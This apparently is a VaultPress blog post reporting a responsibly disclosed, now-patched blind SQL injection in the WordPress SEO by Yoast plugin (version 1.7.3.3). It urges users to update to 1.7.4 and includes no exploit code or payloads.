Blind SQL Injection Vulnerability Found in WordPress SEO Plugin

A blind SQL injection vulnerability has been discovered in the popular WordPress SEO plugin by Yoast. An advisory was issued by the WPScanVulnerability Database after responsibly disclosing the vulnerability to the plugin author:

The latest version at the time of writing (1.7.3.3) has been found to be affected by two authenticated (admin, editor or author user) Blind SQL Injection vulnerabilities.

The authenticated Blind SQL Injection vulnerability can be found within the ‘admin/class-bulk-editor-list-table.php’ file. The orderby and order GET parameters are not sufficiently sanitized before being used within a SQL query.

The latest version of WordPress SEO by Yoast (1.7.4) contains a patch for this vulnerability. The changelog reads: “fixed possible CSRF and blind SQL injection vulnerabilities in bulk editor.

We have scanned all websites with an active VaultPress plan and updated the WordPress SEO plugin to version 1.7.4 where necessary. If there are cases where we’re not able to update the affected plugin ourselves, we will e-mail the website owners to make sure they are aware of this.

If you use the WordPress SEO by Yoast plugin, we strongly recommend that you make sure you are on the latest version. You can update this plugin by visiting Dashboard Updates in your WordPress dashboard, selecting WordPress SEO by Yoast, and clicking the Update Plugins button.

As always, drop us a line if you have any questions or need any help!

About Stefan

A happiness engineer and a human being.
This entry was posted in General, Security. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s